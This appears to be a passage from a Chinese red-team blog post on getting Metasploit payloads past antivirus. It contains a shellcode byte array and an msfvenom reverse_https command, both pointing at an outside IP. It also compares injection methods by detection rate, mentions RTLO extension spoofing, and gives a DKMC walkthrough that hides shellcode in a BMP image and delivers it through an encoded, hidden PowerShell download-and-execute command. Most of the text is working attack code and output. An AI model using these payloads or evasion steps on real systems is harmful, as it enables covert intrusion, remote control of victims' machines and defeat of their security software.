0x00,0x00,0x4d,0x6f,0x7a,0x69,0x6c,0x6c,0x61,0x2f,0x35,0x2e,0x30,0x20,0x28,
0x57,0x69,0x6e,0x64,0x6f,0x77,0x73,0x20,0x4e,0x54,0x20,0x36,0x2e,0x31,0x3b,
0x20,0x54,0x72,0x69,0x64,0x65,0x6e,0x74,0x2f,0x37,0x2e,0x30,0x3b,0x20,0x72,
0x76,0x3a,0x31,0x31,0x2e,0x30,0x29,0x20,0x6c,0x69,0x6b,0x65,0x20,0x47,0x65,
0x63,0x6b,0x6f,0x00,0x68,0x3a,0x56,0x79,0xa7,0xff,0xd5,0x53,0x53,0x6a,0x03,
0x53,0x53,0x68,0xbe,0x15,0x00,0x00,0xe8,0xfd,0x00,0x00,0x00,0x2f,0x59,0x42,
0x37,0x6d,0x54,0x5f,0x72,0x50,0x5f,0x35,0x36,0x4a,0x44,0x6f,0x67,0x50,0x31,
0x6b,0x48,0x71,0x63,0x77,0x75,0x76,0x42,0x38,0x4f,0x6c,0x4d,0x44,0x48,0x4c,
0x56,0x52,0x31,0x47,0x46,0x34,0x31,0x72,0x77,0x56,0x4e,0x4c,0x39,0x79,0x58,
0x71,0x4c,0x42,0x64,0x67,0x51,0x64,0x38,0x59,0x5f,0x4d,0x4a,0x43,0x4b,0x37,
0x55,0x31,0x39,0x57,0x7a,0x70,0x42,0x61,0x48,0x51,0x6d,0x32,0x39,0x39,0x62,
0x75,0x39,0x76,0x6e,0x55,0x30,0x39,0x44,0x4e,0x47,0x33,0x55,0x70,0x79,0x72,
0x58,0x4f,0x66,0x55,0x33,0x6e,0x53,0x77,0x46,0x49,0x41,0x67,0x6b,0x4f,0x50,
0x74,0x00,0x50,0x68,0x57,0x89,0x9f,0xc6,0xff,0xd5,0x89,0xc6,0x53,0x68,0x00,
0x32,0xe8,0x84,0x53,0x53,0x53,0x57,0x53,0x56,0x68,0xeb,0x55,0x2e,0x3b,0xff,
0xd5,0x96,0x6a,0x0a,0x5f,0x68,0x80,0x33,0x00,0x00,0x89,0xe0,0x6a,0x04,0x50,
0x6a,0x1f,0x56,0x68,0x75,0x46,0x9e,0x86,0xff,0xd5,0x53,0x53,0x53,0x53,0x56,
0x68,0x2d,0x06,0x18,0x7b,0xff,0xd5,0x85,0xc0,0x75,0x14,0x68,0x88,0x13,0x00,
0x00,0x68,0x44,0xf0,0x35,0xe0,0xff,0xd5,0x4f,0x75,0xcd,0xe8,0x4a,0x00,0x00,
0x00,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x68,0x00,0x00,0x40,0x00,0x53,0x68,
0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x53,0x89,0xe7,0x57,0x68,0x00,0x20,
0x00,0x00,0x53,0x56,0x68,0x12,0x96,0x89,0xe2,0xff,0xd5,0x85,0xc0,0x74,0xcf,
0x8b,0x07,0x01,0xc3,0x85,0xc0,0x75,0xe5,0x58,0xc3,0x5f,0xe8,0x6b,0xff,0xff,
0xff,0x34,0x35,0x2e,0x33,0x32,0x2e,0x31,0x33,0x37,0x2e,0x31,0x35,0x34,0x00,
0xbb,0xf0,0xb5,0xa2,0x56,0x6a,0x00,0x53,0xff,0xd5 };

Thread Hijacking

填入payload, AES KEY和IV默认

设置保存的path

  • 勾选right to left override(RTLO)可以伪装后缀名

另外还可以将shellcode注入特定进程(效果很好)

spawn notepad32 火绒报毒 外网msf成功上线 查杀率 22/68 效果不错

newthread 火绒报毒 外网msf成功上线 查杀率 31/68 效果一般

apcalertable 火绒不报毒 外网msf没有上线

upx无法加壳 .NET files are not yet supported

成功但是火绒会查杀

DKMC(内网网段使用)

  • DKMC

安装:

1
2
3
$ git clone https://github.com/Mr-Un1k0d3r/DKMC
$ cd DKMC
$ mkdir output

Don’t kill my cat is a tool that generates obfuscated shellcode that is stored inside of polyglot images. The image is 100% valid and also 100% valid shellcode. The idea is to avoid sandbox analysis since it’s a simple “legit” image. For now the tool rely on PowerShell the execute the final shellcode payload.

官方用法:

1
2
3
4
Generate shellcode (meterpreter / Beacon)
Embed the obfuscated shellcode inside the image
PowerShell download the image and execute the image as shellcode
Get your shell
  • Generate shellcode from a raw file
1
2
3
4
5
6
7
>>> sc
(shellcode)>>> set source shellcode.txt
        [+] source value is set.

(shellcode)>>> run
        [+] Shellcode:
\x41\x41\x41\x41
  • Generate the obfuscated shellcode embedded inside of an image.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
>>> gen
(generate)>>> set shellcode \x41\x41\x41\x41
        [+] shellcode value is set.
        
(generate)>>> run
        [+] Image size is 300 x 275
        [+] Generating obfuscation key 0x1f1dad93
        [+] Shellcode size 0x4 (4) bytes
        [+] Generating magic bytes 0xa4d0c752
        [+] Final shellcode length is 0x57 (87) bytes
        [+] New BMP header set to 0x424de9a4c60300
        [+] New height is 0x0e010000 (270)
        [+] Successfully save the image. (/home/ringzer0/tools/DKMC/output/output-1496175261.bmp)

(generate)>>>
  • Generate PowerShell payload to execute on the victim system.
1
2
3
4
5
6
7
8
9
>>> ps
(powershell)>>> set url http://127.0.0.1:8080/output-1496175261.bmp
        [+] url value is set.

(powershell)>>> run
        [+] Powershell script:
powershell.exe -nop -w hidden -enc JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBDAEYAVABUAEwAVgBrAEMALwB6AEUAMABPAFQAWQB4AE4AegBVADAATgBEAFEAdQBNAGoAVQAhAHQAVgBaAHIAYgA5AHAASQBGAFAAMABlAEsAZgA5AGgAVgBDAEgAWgBsAG8AdwBMAFMAYgBmAE4AUgBxAHAAVQBuAG4AbQAwAEUASQBKAEoAMABvAFMAaQBhAHIAIQB2AE0ARwBIAHMATQBUAE4AagBFAHIAZgBOAGYAOQA5AHIAWQB6AGQARQBrAEcAeAAyAHQAVwBzACsAWQBIAHYAdQAzAEwAbAB6AHoAcgBuAEgANAA0AEkAdQB1ADEAbwB5AFQAMwBlAEUARAA2AFIAOABDAFYASQB4AEUAWgBLADkAMwBaADMAZABuAFoASwAvAGIASAA4AEYANQBRAHMALwBjAFAAWABGAFAASQBDADcAZQBmACsAbwBkADAANAArAGsAawAvAEcANwBzADQAawBEAGoAMgBkAHgAbAA3ADIANQB2AGYAWAB2AFQAYgA1AHUAYgB0AEQAOABxAHQASABKAFEAMgBJAFcAVgBwAFMAKwBUADAAUQBmAHMAegBCAEoAdABsAEQASgBJAFUASABmAGkAegBCAGUAZwB3AHUATABTADQARwA3AGMAKwBZADEAUgB6AFcAbwBxAGcAcAAhAHMAcgBDADAAZQBGAGgASQA1AFkAUwBRAHIAMQA2AGQAbwA1ACEAMQA1AFMAQwBZAE0AdwBaAEsATgBNAGkAdgA4AGoAVgBEAEMAUwBVAHoAOABhADMANABHAG4AeQBrADUAUwArAE8AMABkAGMAagBDAG4AUAB3ADUASQBHADkAVwBhADQAbwAxAHIAbwBwADIATgBmAGgARQBmAFQAYQBoADAAMwA0AGsAeQBiAHgAcgBkAHYAaABqAFUAcwBWADAAZABPAGEAeABGAFQAcgBrAHoARABUAFoAUwBHAHcAUABFADUATgB5AHoAeQBZAEsAVQBMAEQAcABJAEkAVABLAFAARABQAEMAbQBVAG0ARwBqAG4AaQBvAFgANwBlADgANQBGAHEATwBnAEUAdQBwAGgAdABDAFIAMwBRAE0AKwBFAHIAdwAwAHIAaABLAHYAWQBqAFEAYwBjAHkAegBMAGUAVgA1AGwAbABGAG0AUQBiAGUAOQBuAEQALwBOAGQAKwBYAG8ASABDAFMAYwB4AEkAdQB4AFIAegBNAFUAaABoAHoAYgBwAE4AUAA1AGoAIQB2AG8AaAArAEgAbQBnAFcAIQA0AHgAcQBrAGkARgB5AFEAUwArAGEAQgBjAG8ANQBwADYASABQAG8AdwAyAFIAawBkAHUARwB1ADIAUAB0AHIASgA1AG4AcgBrAHoAQwBxAHAANgBWAGwASQAwAG4AYgA2AHUAeABrAHAASwAyAG0ARwB0AFoAbQBwAFcAdgBNAFcAbgBoAHQAcwBJAHUAIQBQAEsAUwBZAC8AQgBiAEoAZgBMAEgAbwBSAC8AVwBsAFkAdQBGAFIAdQBFAFUAcABqAHkAKwBLAGEANQBpAE4AIQBPADcARgA3ACEAbgBGAHMAaQBRAGYAUwBjAFUAbQBIAFMAeQBLAGEAaQBFAFQAZgBDAHcATgBaACEAegBXAGkAIQB4AFQAcQBvAGEAagBFAFMAbABCAGYAQwA0AG4AOAA2AGIAbwBkADQASwBwAGwAOQBSAG8AYgBMADgAMgBkAGIAWABJAGcAMQBuAEcANAArAG4AMAA3AFAAagBIAFkARABZAE4ARgBxADAAegBIAEIAeABlAEMAdQBhAFAASABsAE0AOQBJAGIAegBVAHYAagBtACsAZwBMAG8ATwB1AEMALwBiAFgAWAA0ADAAVABpAGMAOABMACsAVQBtAFQARgBnAEkAegBTAFMAawAhAGYATQBLAHQAWgByAGIARwBJAFUASgBoAHcAdwArAHAAdwBqAHIAWQB0ADIAbQBrAFEAKwAhADMAdwBRAE8AVQA2AHAAVABpAG0AdwB5ADMASgB6AFcAQwBwAGoAKwBQAGIAYwBlAE0AKwA2AEQAcgBIAG0AbwBDAG8AVgBWAG8AVwBDAHMAcAA4AFcAcwBXAEQAZQBOAGsANwAhAEQAIQBTAEsAOABlAGoAYQBRADMAUQBuADIAQwBCAFQAUgBlAFYAOABrAHgAZQByAHAATQB3AFkAWgBEAFUANgBWAHMAawBrAHYAeABpAGIAMQBiAE8ASQBDADUAZQBEAGIAcABCAFkAcQBsAGcALwBWAFkAaQAyAHkAVwArAE8AeAAzAEUANwBNAE4AZgBPAG8AMABrAFcANgBrAGYAVQBDAHQASABrAEoARABSAEUAcQBMAFcATQBQAGQAWQBCAHcARABOAHcASQBQAEUAWgA1AGkAbwA1AE4AagBwAGsAUAA5AGMAUgBsADAANgBJAFUAWQB5AHMAMgBEAGMAbwA1AEMANgBlAFkAYQBZAG4AYwA0AEoAcwBVAEUAMQBlAG4ANgBwAEoAWQA5AGEAYQBTAEwATQBjAEYAZgBSAEoARQBIACEASwBjAGsATABsAEoAbQA5AE0AcABlAGsAZgBlAGUAcABrADIANgBSAFIAOAA0AHgAVQA3AEsASgBwAHQAMQBWAGsAcABmACEAVgB1AGEALwBXAGoASgBsAHcAdQB0AEUAMAB1AG0AZABUAG8AVQB5AGsAVgBUADcAWAA1ADMAeABWAGEAMgBOAFoARwB2AFEAMABKAE8AYwBsAG0AMABkAGIARABlAHEATABUAGYAaQB2AEYAQwBYAEIAKwBmAG4AWQBSAFgAWQBlADMAbAAxAGUAZABtADMANgBYAHoAZwBhADMAawBVADcAZABmAEYAUABRAFgAVQAhAFQAaABYAEUARABQAFQAegBVAHEAQwBaAHgARgAzAEoAQgAvAFMAYgBWADEASAB3AHoAMAB6AG8ANgBmAFAAdQAyAHUAdgBmAEIAcQBlAEMAdgBlAG4AaABRAE8AYQBpADgARgBiAEcATwBZAGwAMgB1AHYAdgB2AHoAZgBmAFgARABIADMAdgB2AHEAOAA0ADQAaQBOADUAawA3AFYAZgA2ACsAaQBOAGEAcQBMADUAcQBpAGQAbABpAGUAagBvAC8AdgBiADYAZQB6AEQANgBQAGsANQBPAGIAdABQADMAKwB4AGgAUQA3AFYASwBvAFoANQBjAGcANABtAGwAMABoAHYATABhAFEANwBkAHkAdgBlAG8ASwBsAE0AMAB5AHoAKwBMAGoATgBRAFkAYgAhADAAZgA3AHgAIQAxAEcAdwBVAGUATgBjAGUASwBtAEYAUABqAEUAMwB0AFAARwBWAHUAWQA1AFEAZABoAGQANAB1ADcAKwAzADkAYwA0AGkAdgB3AE8AdABSADQAYwB0AFgAaAAwAGUAMwBtAEQAQgB5AE8ANQB6AEMARAB0AGYASQBKAHoAcQBtAFYAMgA1ADMANgA5AFUAMABCAFkAcgA5ACsAOABxAEMATQB2AHIATgA5ADQAUQBVAFcASQArAG0AOQA1AE8AcgBmAFoAWgBoAEYAKwBxAGkAMgBkADEAcgBSAGgAYQAwAHYANQA5ADcAZQBZADYAawBkAEQAcwA5AGkANAA3AHIAVgBiAGMAOQBPAGIALwBPAHoAMgA1AFkARwBmADQANQA3ACsAVwBuAHMAZAAzAEwANAB5ACsAaQByAEsASwAvAFQAeABzAEcANgBGAFAAWAAvAHcAagAvAHYANABOAE0AbABlAFUAYQBRAHgAMgAwAGYAYwA0AHIASAByAHoAWgBZAEIAeQBxAGEANgBkACEATABaAFMAaQBpAHEAYwA1AEYAZAA2AE4ARAB2AEQAagB1ADMAaQBTAFcARgAzAHgALwBpAFUANgB1AEIAawBRAHQAWgBRAFUAdQB3AEgAbgBzAHQAZwBRAFEANgBzADkAWgBPACEAMABsAFQAcQA4AHEAMABZADQAMgBFAHUAUwBqAC8AUQB1AEYAWQByADYAcAArADEANQAwAGUAdAB3AFQASwB1ADkAOAArAEQAZgBxAHQAdQBrAFoAUABXAFYANwBKAHQAaABEAHkAUQBNAHEASgBXAFUALwB0ADcAZQBPAHEAVAAwAHoAZwAxAFAALwBMAGMARwBmAFkAWAB1AFUATQBzAHMAdQBWACsAawBUADUANABnAEsAZQA1ADgAcQBrAFkAWgB3AFkASAArAEwARgBiAEwAeQAxAGIAYwBuAHMAaQBqAFAAOABMAHAAegBWADkAdABFAFEATAAhACEAIQA9ACIALgBSAGUAcABsAGEAYwBlACgAIgAhACIALAAgACIAQQAiACkAKQApADsASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACgAJABzACwAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsA

(powershell)>>>

base64decode:

1
$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("H4sICFTTLVkC/zE0OTYxNzU0NDQuMjU!tVZrb9pIFP0eKf9hVCHZlowLSbfNRqpUnnm0EIJJ0oSiar!vMGHsMTNjErfNf99rYzdEkGx2tWs+YHvu3LlzzrnH44Iuu1oyT3eED6R8CVIxEZK93Z3dnZK/bH8F5Qs/cPXFPIC7ef+od04+kk/G7s4kDj2dxl725vfXvTb5ubtD8qtHJQ2IWVpS+T0QfszBJtlDJIUHfizBegwuLS4G7c+Y1RzWoqgp!srC0eFhI5YSQr16do5!15SCYMwZKNMiv8jVDCSUz8a34Gnyk5S+O0dcjCnPw5IG9Wa4o1rop2NfhEfTah034kybxrdvhjUsV0dOaxFTrkzDTZSGwPE5NyzyYKULDpIITKPDPCmUmGjnioX7e85FqOgEuphtCR3QM+Erw0rhKvYjQccyzLeV5llFmQbe9nD/Nd+XoHCScxIuxRzMUhhzbpNP5j!voh+HmgW!4xqkiFyQS+aBco5p6HPow2RkduGu2PtrJ5nrkzCqp6VlI0nb6uxkpK2mGtZmpWvMWnhtsIu!PKSY/BbJfLHoR/WlYuFRuEUpjy+Ka5iN!O7F7!nFsiQfScUmHSyKaiETfCwNZ!zWi!xTqoajESlBfC4n86bod4Kpl9RobL82dbXIg1nG4+n07PjHYDYNFq0zHBxeCuaPHlM9IbzUvjm+gLoOuC/bXX40Tic8L+UmTFgIzSSk!fMKtZrbGIUJhww+pwjrYt2mkQ+!3wQOU6pTimwy3JzWCpj+PbceM+6DrHmoCoVVoWCsp8WsWDeNk7!D!SK8ejaQ3Qn2CBTReV8kxerpMwYZDU6Vskkvxib1bOIC5eDbpBYqlg/VYi2yW+Ox3E7MNfOo0kW6kfUCtHkJDREqLWMPdYBwDNwIPEZ5io5NjpkP9cRl06IUYys2Dco5C6eYaYnc4JsUE1en6pJY9aaSLMcFfRJEH!KckLlJm9Mpekfeepk26RR84xU7KJpt1Vkpf!Vua/WjJlwutE0umdToUykVT7X53xVa2NZGvQ0JOclm0dbDeqLTfivFCXB+fnYRXYe3l1edm36Xzga3kU7dfFPQXU!ThXEDPTzUqCZxF3JB/SbV1Hwz0zo6fPu2uvfBqeCvenhQOai8FbGOYl2uvvvzffXDH3vvq844iN5k7Vf6+iNaqL5qidliejo/vb6ezD6Pk5ObtP3+xhQ7VKoZ5cg4ml0hvLaQ7dyveoKlM0yz+LjNQYb!0f7x!1GwUeNceKmFPjE3tPGVuY5Qdhd4u7+39c4ivwOtR4ctXh0e3mDByO5zCDtfIJzqmV25369U0BYr9+8qCMvrN94QUWI+m95OrfZZhF+qi2d1rRha0v597eY6kdDs9i47rVbc9Ob/Oz25YGf457+Wnsd3L4y+irKK/TxsG6FPX/wj/v4NMleUaQx20fc4rHrzZYByqa6d!LZSiiqc5Fd6NDvDju3iSWF3x/iU6uBkQtZQUuwHnstgQQ6s9ZO!0lTq8q0Y42EuSj/QuFYr6p+150etwTKu98+DfqtukZPWV7JthDyQMqJWU/t7eOqT0zg1P/LcGfYXuUMssuV+kT54gKe58qkYZwYH+LFbLy1bcnsijP8LpzV9tEQL!!!=".Replace("!", "A")));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();
  • Built-in Web Server to deliver the image
1
2
3
4
5
6
7
8
>>> web 
(web)>>> set port 8080
        [+] port value is set.

(web)>>> run
        [+] Starting web server on port 8080

127.0.0.1 - - [30/May/2017 16:18:43] "GET /output-1496175261.bmp HTTP/1.1" 200 -

详细使用:

msf生成raw格式的shellcode

1、先利用msf生成raw文件
2、利用sc讲raw文件转换为shellcode
3、利用gen将上一步的shellcode注入到一个BMP图像
4、利用ps生成基于powershell的BMP文件的payload
5、利用web提供的简单web服务进行分发BMP文件

1
msfvenom -p windows/meterpreter/reverse_https LHOST=45.32.137.154 LPORT=5566 -e x86/shikata_ga_nai -b "\x00" -i 5 -a x86 -f raw -o dkmctest.raw
1
2
3
4
5
6
7
8
9
选择sc

(shellcode)>>> set source /root/test/dkmctest.raw

(shellcode)>>> run
        [+] Shellcode:
\xdd\xc4\xbb\xa5\x58\x6d\x99\xd9\x74\x24\xf4\x58\x29\xc9\xb1\xba\x83\xe8\xfc\x31\x58\x14\x03\x58\xb1\xba\x98\x24\x87\x82\xb2\x82\x2d\x3e\xed\x59\xf5\x4b\x55\x8b\x3c\x02\xd9\xfa\xd5\x71\x1d\x96\x3d\xf9\xe2\x6c\xe1\xb0\x8a\xf5\xab\x01\x52\xfe\xaa\xde\x02\x27\x5d\xd7\x0c\x3f\x55\x7c\xa8\x50\x5a\xf4\xca\x20\x18\x67\x42\x5a\x1b\xb2\x0f\x29\x1a\x08\xc5\x9d\x4c\x94\xa5\x5e\x3b\x41\x83\xac\x6f\x4c\x1e\x37\xcd\xe1\xfe\xa7\xc6\x78\x16\x0d\xef\xeb\x43\xd9\x37\x8c\xdd\x49\x37\x2f\xdb\x22\x19\x95\x6d\x06\x76\xf9\x23\x50\xdb\x1b\xbd\x90\x57\x47\xc7\xe0\x09\x59\x31\xe3\xd4\xa2\x7b\x3a\xe2\x38\x0a\x91\xb6\xd2\x22\x5f\xa6\xaa\x5e\xfa\x2c\xc3\xf0\x65\x6b\x8c\x59\x13\x04\xce\x19\xea\xae\xc8\xdc\x87\x5b\x83\xfe\x8b\x1d\x99\xae\xd0\xdd\x29\xef\x40\xc4\x34\x01\xb6\x4f\xdf\x51\xf0\x9f\xb5\x0e\x01\x3e\x53\xb0\xe6\x24\x7b\xd4\xcf\x62\x86\xe8\x7c\x54\xcf\xd0\x8f\xbc\x70\xef\xd9\x0b\xb3\x9f\x85\xc1\x3e\x33\xca\x84\xeb\xfa\x55\x05\xfe\x1b\x58\x9a\x0f\xbb\xdc\xdf\x44\xec\x1f\x18\x46\xcd\xd3\x6d\xa5\xc1\x18\x66\x14\xc7\xea\x4a\x9e\x59\x87\x90\xf6\x30\xee\xa3\x0b\x8c\x04\xd9\x03\x6e\xb5\x59\x99\x1b\xdb\xa1\x90\x20\x8c\x3e\x69\xb7\x78\xee\xb8\xb9\x8f\x22\x97\xf5\x07\x37\xca\xb2\x11\xcb\x69\x95\xa6\xd6\x94\x10\x5c\x8e\xaf\xb3\x92\xad\x5b\xc0\x58\xd4\xf0\xdf\xc0\x03\x41\x99\x78\xfc\x4b\x79\xeb\x8c\x8d\x51\x89\x43\x27\xd6\x08\x4f\xb5\x68\x09\xf2\x1a\xd4\xd3\xcc\xfe\xc7\x5d\x75\xdb\xfc\x21\xab\x1f\x4e\xa4\x5b\xfe\x19\x63\x29\x1d\xb7\x8d\x15\x4b\x8e\xbf\xe0\xa1\xfd\xec\x8e\xc3\x43\x90\xf3\x28\x4e\x31\x1e\xfc\x0f\xba\x02\x27\xa3\x29\x7c\xc5\x69\x0e\xe2\x5d\x48\xd3\xd0\xe3\x77\x37\x16\x5d\xcd\x64\x49\x7d\x46\xaa\xcd\xe3\xdb\xa3\x55\xf1\x3b\x45\xcb\xe9\x89\xfa\x09\x6a\xaf\x05\x45\xa5\x8f\x2d\xfb\x88\x0d\x4e\x8e\x59\xdc\xd6\x25\xd9\x6d\x68\xc8\xe6\x79\x14\x8f\x46\x0f\x12\x2e\xa9\xfc\x14\x21\x0e\xdc\x9a\x19\x14\xe7\xe3\xe6\xc7\x42\xa8\xf3\xf1\x8a\x40\xf6\xd2\x78\x5d\xb2\xe5\xaf\x12\x56\xc9\x40\x11\x74\x4b\xc2\x12\x7e\xd4\xde\x8d\x4a\x6f\xc5\x7c\x93\x7b\x4f\x98\xbc\x18\x78\xfa\x7d\x92\x7c\x1c\x7d\x7f\xf8\x21\x79\xe0\xb8\xf9\x6a\x86\xe0\xcd\x09\xdc\xb5\xe9\xde\x52\x51\xcd\xfe\xbf\x19\xab\x76\x84\xc4\x42\x31\x76\x7b\x29\x7b\x2d\x34\x82\x1f\x0c\xa5\x1c\xa9\xcf\x54\x5a\x3b\x1a\xe2\xd5\x9a\x1e\xe2\x7b\xa3\x39\x64\xff\x78\xc2\x72\x88\x70\xc6\x06\xcd\xa8\xbc\x25\xfe\x56\x81\x75\x05\x8b\x8a\x6f\x16\xe2\xd6\x86\xdb\xf6\x1d\xa0\x31\x25\x55\x66\x25\x87\xa1\xb9\x96\x70\x87\x19\xcb\x69\xf6\x2f\xad\xaa\x4e\x86\x08\x40\xe3\xd8\xc4\x6f\x06\xa0\x01\x16\xfd\x26\x32\x2e\x99\xc2\x9a\xea\x11\x9a\x27\x9d\xea\x9a\x48\x60\x2a\x8a\x82\x3e\xe5\xcd\x93\x2c\x78\x01\x06\x29\x64\x5c\xda\x0c\xea\xd3\xca\xde\x84\xd1\xe1\xd9\x5b\xc3\xf2\x3c\x9a\x7d\x02\x65\xc9\x54\xe5\xbc\x46\x9b\x64\xe3\xd1\x94\x64\xf6\xcf\xf9\xec\x26\xec\xa2\x08\xfe\x2b\x6b\xe6\x87\xc2\xca\xed\x4e\xf0\x17\xf1\xc0\xa6\xea\x95\x1e\xd6\x2f\xce\x9a\x75\x8a\x4b\xb8\x2c\xa3\xec\x13\x68\x2f\xe3\x66\x06\x28\x6b\xdc\x91\x3f\xc7\xbe\x41\xd0\x95\x9a\xae\xd2\x8d\x9a\x9d\xa5\x76\x1d\x37\x69\x29\xa6\x43\x8e\xc8\xc0\xe8\x93\xc2\x51\xec\x62\x8e\x74\xbe\xfe\x2e\xc5\xf2\x4b\xd7\xb2\xdd\xc9\xd1\x07\x34\x05\x8d\x13\x24\x3f\x49\xee\xb0\x78\x5e

exit
1
2
3
4
5
6
7
8
9
10
11
12
13
14
gen

(generate)>>> set shellcode \xdd\xc4\xbb\xa5\x58\x6d\x99\xd9\x74\x24\xf4\x58\x29\xc9\xb1\xba\x83\xe8\xfc\x31\x58\x14\x03\x58\xb1\xba\x98\x24\x87\x82\xb2\x82\x2d\x3e\xed\x59\xf5\x4b\x55\x8b\x3c\x02\xd9\xfa\xd5\x71\x1d\x96\x3d\xf9\xe2\x6c\xe1\xb0\x8a\xf5\xab\x01\x52\xfe\xaa\xde\x02\x27\x5d\xd7\x0c\x3f\x55\x7c\xa8\x50\x5a\xf4\xca\x20\x18\x67\x42\x5a\x1b\xb2\x0f\x29\x1a\x08\xc5\x9d\x4c\x94\xa5\x5e\x3b\x41\x83\xac\x6f\x4c\x1e\x37\xcd\xe1\xfe\xa7\xc6\x78\x16\x0d\xef\xeb\x43\xd9\x37\x8c\xdd\x49\x37\x2f\xdb\x22\x19\x95\x6d\x06\x76\xf9\x23\x50\xdb\x1b\xbd\x90\x57\x47\xc7\xe0\x09\x59\x31\xe3\xd4\xa2\x7b\x3a\xe2\x38\x0a\x91\xb6\xd2\x22\x5f\xa6\xaa\x5e\xfa\x2c\xc3\xf0\x65\x6b\x8c\x59\x13\x04\xce\x19\xea\xae\xc8\xdc\x87\x5b\x83\xfe\x8b\x1d\x99\xae\xd0\xdd\x29\xef\x40\xc4\x34\x01\xb6\x4f\xdf\x51\xf0\x9f\xb5\x0e\x01\x3e\x53\xb0\xe6\x24\x7b\xd4\xcf\x62\x86\xe8\x7c\x54\xcf\xd0\x8f\xbc\x70\xef\xd9\x0b\xb3\x9f\x85\xc1\x3e\x33\xca\x84\xeb\xfa\x55\x05\xfe\x1b\x58\x9a\x0f\xbb\xdc\xdf\x44\xec\x1f\x18\x46\xcd\xd3\x6d\xa5\xc1\x18\x66\x14\xc7\xea\x4a\x9e\x59\x87\x90\xf6\x30\xee\xa3\x0b\x8c\x04\xd9\x03\x6e\xb5\x59\x99\x1b\xdb\xa1\x90\x20\x8c\x3e\x69\xb7\x78\xee\xb8\xb9\x8f\x22\x97\xf5\x07\x37\xca\xb2\x11\xcb\x69\x95\xa6\xd6\x94\x10\x5c\x8e\xaf\xb3\x92\xad\x5b\xc0\x58\xd4\xf0\xdf\xc0\x03\x41\x99\x78\xfc\x4b\x79\xeb\x8c\x8d\x51\x89\x43\x27\xd6\x08\x4f\xb5\x68\x09\xf2\x1a\xd4\xd3\xcc\xfe\xc7\x5d\x75\xdb\xfc\x21\xab\x1f\x4e\xa4\x5b\xfe\x19\x63\x29\x1d\xb7\x8d\x15\x4b\x8e\xbf\xe0\xa1\xfd\xec\x8e\xc3\x43\x90\xf3\x28\x4e\x31\x1e\xfc\x0f\xba\x02\x27\xa3\x29\x7c\xc5\x69\x0e\xe2\x5d\x48\xd3\xd0\xe3\x77\x37\x16\x5d\xcd\x64\x49\x7d\x46\xaa\xcd\xe3\xdb\xa3\x55\xf1\x3b\x45\xcb\xe9\x89\xfa\x09\x6a\xaf\x05\x45\xa5\x8f\x2d\xfb\x88\x0d\x4e\x8e\x59\xdc\xd6\x25\xd9\x6d\x68\xc8\xe6\x79\x14\x8f\x46\x0f\x12\x2e\xa9\xfc\x14\x21\x0e\xdc\x9a\x19\x14\xe7\xe3\xe6\xc7\x42\xa8\xf3\xf1\x8a\x40\xf6\xd2\x78\x5d\xb2\xe5\xaf\x12\x56\xc9\x40\x11\x74\x4b\xc2\x12\x7e\xd4\xde\x8d\x4a\x6f\xc5\x7c\x93\x7b\x4f\x98\xbc\x18\x78\xfa\x7d\x92\x7c\x1c\x7d\x7f\xf8\x21\x79\xe0\xb8\xf9\x6a\x86\xe0\xcd\x09\xdc\xb5\xe9\xde\x52\x51\xcd\xfe\xbf\x19\xab\x76\x84\xc4\x42\x31\x76\x7b\x29\x7b\x2d\x34\x82\x1f\x0c\xa5\x1c\xa9\xcf\x54\x5a\x3b\x1a\xe2\xd5\x9a\x1e\xe2\x7b\xa3\x39\x64\xff\x78\xc2\x72\x88\x70\xc6\x06\xcd\xa8\xbc\x25\xfe\x56\x81\x75\x05\x8b\x8a\x6f\x16\xe2\xd6\x86\xdb\xf6\x1d\xa0\x31\x25\x55\x66\x25\x87\xa1\xb9\x96\x70\x87\x19\xcb\x69\xf6\x2f\xad\xaa\x4e\x86\x08\x40\xe3\xd8\xc4\x6f\x06\xa0\x01\x16\xfd\x26\x32\x2e\x99\xc2\x9a\xea\x11\x9a\x27\x9d\xea\x9a\x48\x60\x2a\x8a\x82\x3e\xe5\xcd\x93\x2c\x78\x01\x06\x29\x64\x5c\xda\x0c\xea\xd3\xca\xde\x84\xd1\xe1\xd9\x5b\xc3\xf2\x3c\x9a\x7d\x02\x65\xc9\x54\xe5\xbc\x46\x9b\x64\xe3\xd1\x94\x64\xf6\xcf\xf9\xec\x26\xec\xa2\x08\xfe\x2b\x6b\xe6\x87\xc2\xca\xed\x4e\xf0\x17\xf1\xc0\xa6\xea\x95\x1e\xd6\x2f\xce\x9a\x75\x8a\x4b\xb8\x2c\xa3\xec\x13\x68\x2f\xe3\x66\x06\x28\x6b\xdc\x91\x3f\xc7\xbe\x41\xd0\x95\x9a\xae\xd2\x8d\x9a\x9d\xa5\x76\x1d\x37\x69\x29\xa6\x43\x8e\xc8\xc0\xe8\x93\xc2\x51\xec\x62\x8e\x74\xbe\xfe\x2e\xc5\xf2\x4b\xd7\xb2\xdd\xc9\xd1\x07\x34\x05\x8d\x13\x24\x3f\x49\xee\xb0\x78\x5e
        [+] shellcode value is set.

(generate)>>> run
        [+] Image size is 300 x 275
        [+] Generating obfuscation key 0x345c8c05
        [+] Shellcode size 0x300 (768) bytes
        [+] Generating magic bytes 0x8402012f
        [+] Final shellcode length is 0x353 (851) bytes
        [+] New BMP header set to 0x424de9a8c30300
        [+] New height is 0x0e010000 (270)
